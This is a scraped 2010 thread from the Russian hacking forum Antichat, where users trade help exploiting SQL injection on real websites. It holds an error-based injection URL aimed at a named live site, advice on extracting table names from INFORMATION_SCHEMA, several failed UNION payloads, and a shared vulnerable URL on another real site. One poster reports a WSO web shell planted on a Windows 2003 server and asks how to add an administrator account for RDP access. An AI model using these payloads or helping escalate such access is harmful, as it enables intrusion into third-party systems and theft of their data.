19.09.2010, 16:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
547
1) кавычки хексить/чарить не надо;
2) если бока, то тащи с INFORMATION_SCHEMA.COLUMNS->TABLE_NAME
или Mysql->columns_priv-> Table_name если возможно.
|
|
|
19.09.2010, 20:20
|
|
Новичок
Регистрация: 26.04.2026
Сообщений: 0
С нами:
28659
Репутация:
0
|
|
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция' LIKE CONCAT('%',url,'%')
как раскрутить?
|
|
|
|
19.09.2010, 21:18
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
Сообщение от Strilo4ka
Код:
http://www.skunk2.com/news2.php?news_id=43%20or%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28version%28%29,floor%28rand%280%29*2%29%29%29--
4.1.221 эфект тот же....
|
|
|
|
19.09.2010, 21:31
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами:
9116636
Репутация:
39
|
|
если с
/display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...
|
|
|
|
19.09.2010, 21:47
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами:
10889431
Репутация:
34
|
|
Сообщение от roddik
если с
/display.php?selected=322' выдается ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ..., но 323-1, любые комментарии, в т.ч. /**/ выдают ошибку, selected=(select 322) тоже, о чем это может говорить? смущает то, что если бы софтина была написана правильно, ошибки бы не было, но не могу понять, какое фильтрование используется...
Так сложно сказать.. кидай в личку сылку если хочешь.. надо смотреть..
|
|
|
|
19.09.2010, 22:48
|
|
Новичок
Регистрация: 26.04.2026
Сообщений: 0
С нами:
28659
Репутация:
0
|
|
Сообщение от Strilo4ka
интересно
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1/*
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1--
SELECT title FROM leader_page_titles WHERE '/news.php?newsid=тут иньекция'='1' and union select 1#
Это всё уже попробовал,не катит. Пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1
|
|
|
|
19.09.2010, 22:50
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами:
10889431
Репутация:
34
|
|
Сообщение от Darth Padla
Darth Padla said:
Это всё уже попробовал,не катит. Пишет
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'and+union+select+1/*' LIKE CONCAT('%',url,'%')' at line 1
ну могу тебе сказать тока как и предыдущему человеку кидай сыль в личку... ему ответ кинул надеюсь поможет ... если смогу и тебе помогу..
|
|
|
|
20.09.2010, 01:54
|
|
Новичок
Регистрация: 26.04.2026
Сообщений: 0
С нами:
28659
Репутация:
0
|
|
А почему в личку?мне не жалко,просто из принципа раскрутить хочется.
view-source:http://znakomye.ru/news.php?дальше скуля
|
|
|
|
20.09.2010, 08:58
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Народ, такой вопрос.
Вообщем залил шел wso2 на win2k3 имею полный доступ ко всему что находится на винте.
Как через шелл создать юзера и добавить его в группу админов что бы я мог зайти на RDP ?
|
|
|
|
20.09.2010, 09:37
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами:
10889431
Репутация:
34
|
|
Сообщение от Darth Padla
Darth Padla said:
А почему в личку?мне не жалко,просто из принципа раскрутить хочется.
view-source:http://znakomye.ru/news.php?
дальше скуля
Блин проковырялся , но ничё не вышло....
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
